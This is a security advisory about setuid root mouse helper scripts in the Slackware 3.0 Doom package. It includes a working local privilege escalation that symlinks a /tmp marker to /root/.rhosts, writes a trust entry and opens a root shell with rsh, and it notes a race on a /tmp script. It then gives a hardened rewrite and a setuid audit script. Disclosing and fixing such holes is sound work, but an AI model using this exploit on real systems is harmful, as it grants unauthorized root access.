COMMAND
/usr/games/doom/killmouse
SYSTEMS AFFECTED
Slackware 3.0; other distributions might be affected too.
PROBLEM
The problem is in the killmouse/startmouse commands that are part
of the Doom package on Linux systems. Each is actually a C wrapper
that runs one of two shell scripts (killmouse.sh/startmouse.sh), and
the wrapper runs setuid root, so the scripts run as root as well.
Thanks to Bo (bo@ebony.iaehv.nl) who originally posted this.
/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi
/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi
This can be exploited in a few similar ways. Here's just
one. Let's assume the gpm utility is not running. We can't
start it up ourselves as gpm is only to be run by root. So we'll
use startmouse to fire it up:
$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse
$ ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms
Fine, it's running. Now we'll use killmouse to kill the
process, but first we set our umask to 0 and link /tmp/gpmkilled
to /root/.rhosts:
$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms
$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts
$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#
On some systems gpm might not be started from /etc/rc.d/rc.local,
so the startmouse script will fail. But gpm might be running
already. If neither of these conditions is met, note that
startmouse.sh creates /tmp/gpmscript and runs it in a shell.
There's a window of time between creating the script and
executing it, so we have a nice race condition here; the file can
be replaced with anything you like prior to execution.
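Both scripts share the same two defects: a predictable, world-writable path in /tmp that root follows blindly (symlinks included, with the caller's umask inherited), and a helper script that is created and then executed from that same directory. The following is a hardened rewrite of the state-file handling, written here as an added example; it is not the Slackware scripts and not code from the original advisory. It assumes the wrapper still runs as root and that the marker lives in a root-only directory, STATE_DIR (default /var/run/doom, a path chosen for this example and overridable for testing), rather than in /tmp. The function names (state_file, safe_path, prepare_state_dir, mark_gpm_killed, consume_gpm_killed, gpm_command_from, restart_gpm_from) are this example's own.

```shell
#!/bin/sh
# Hardened state-file handling for a killmouse/startmouse style helper
# (added example, not the Slackware scripts). Assumptions: the wrapper
# still runs as root, and STATE_DIR (default /var/run/doom, overridable
# for testing) is a directory only root can write.

state_file() {
    printf '%s/gpmkilled\n' "${STATE_DIR:-/var/run/doom}"
}

# A path is acceptable only if it is absent or a regular, non-symlink file.
# The original scripts follow whatever /tmp/gpmkilled points at.
safe_path() {
    p="$1"
    [ -L "$p" ] && return 1
    if [ -e "$p" ] && [ ! -f "$p" ]; then
        return 1
    fi
    return 0
}

# Create the private state directory with mode 0700. umask 077 overrides
# whatever umask the unprivileged caller handed to the setuid wrapper.
prepare_state_dir() {
    umask 077
    d="${STATE_DIR:-/var/run/doom}"
    [ -L "$d" ] && return 1
    if [ ! -d "$d" ]; then
        mkdir -m 0700 "$d" || return 1
    fi
    return 0
}

# killmouse side: record that gpm was stopped. Returns 1 and writes
# nothing if the state path has been tampered with.
mark_gpm_killed() {
    prepare_state_dir || return 1
    f=$(state_file)
    safe_path "$f" || return 1
    [ -f "$f" ] && return 0          # marker already present, nothing to do
    # set -C (noclobber) turns the redirect into an exclusive create, so a
    # file or symlink that raced in after the check above is not written to
    ( set -C; : > "$f" ) 2>/dev/null || return 1
    return 0
}

# startmouse side: consume the marker. Returns 0 only if a genuine marker
# (regular file, not a symlink) was present; anything else is left for
# the administrator to inspect.
consume_gpm_killed() {
    f=$(state_file)
    safe_path "$f" || return 1
    [ -f "$f" ] || return 1
    rm -f "$f"
    return 0
}

# startmouse side: pick the gpm line out of the root-owned rc.local and
# print it. Anchoring on the binary path avoids matching comments that
# merely mention "gpm", which the original grep would also pick up.
gpm_command_from() {
    grep '^[[:space:]]*/usr/bin/gpm' "$1" | head -n 1
}

# Run that line directly. No script is written to /tmp and then executed,
# so the create-then-execute window described above no longer exists.
restart_gpm_from() {
    cmd=$(gpm_command_from "$1")
    [ -n "$cmd" ] || return 1
    sh -c "$cmd"
}
```

The two checks that matter most are the symlink refusal in safe_path and the forced umask: with those in place, a marker pointing at /root/.rhosts is rejected outright, and even a marker that were created would be mode 0600 rather than inheriting a caller's umask 0.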
SOLUTION
Remove the setuid bits from killmouse/startmouse. Better yet,
nuke them. While you're at it, nuke Doom too - it's a stupid game
anyway :-)
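To apply the first half of that advice across a whole games tree rather than one pair of files, here is a small audit helper, added as an example and not part of the advisory or the Slackware package. It lists every setuid file below a directory (default /usr/games, an assumption of this example) and strips the bit, with a dry-run mode that only reports; the names list_setuid and strip_setuid are this example's own.

```shell
#!/bin/sh
# Setuid audit helpers (added example). DIR defaults to /usr/games and is
# an argument so the functions can be pointed at a test tree.

# Print every regular file with the setuid bit set below DIR, one per line.
list_setuid() {
    find "${1:-/usr/games}" -type f -perm -4000 -print 2>/dev/null
}

# Strip the setuid bit from every file list_setuid reports and print the
# paths that were changed. With a second argument of "dry", only report.
strip_setuid() {
    dir="${1:-/usr/games}"
    if [ "${2:-}" = dry ]; then
        list_setuid "$dir" | sed 's/^/would strip setuid: /'
    else
        # -print fires only when the preceding chmod succeeded
        find "$dir" -type f -perm -4000 -exec chmod u-s {} \; -print
    fi
}
```

Run strip_setuid with "dry" first and read the list: a setuid root wrapper that exists only to run a shell script, as killmouse/startmouse do, is exactly the kind of entry that should not survive the review.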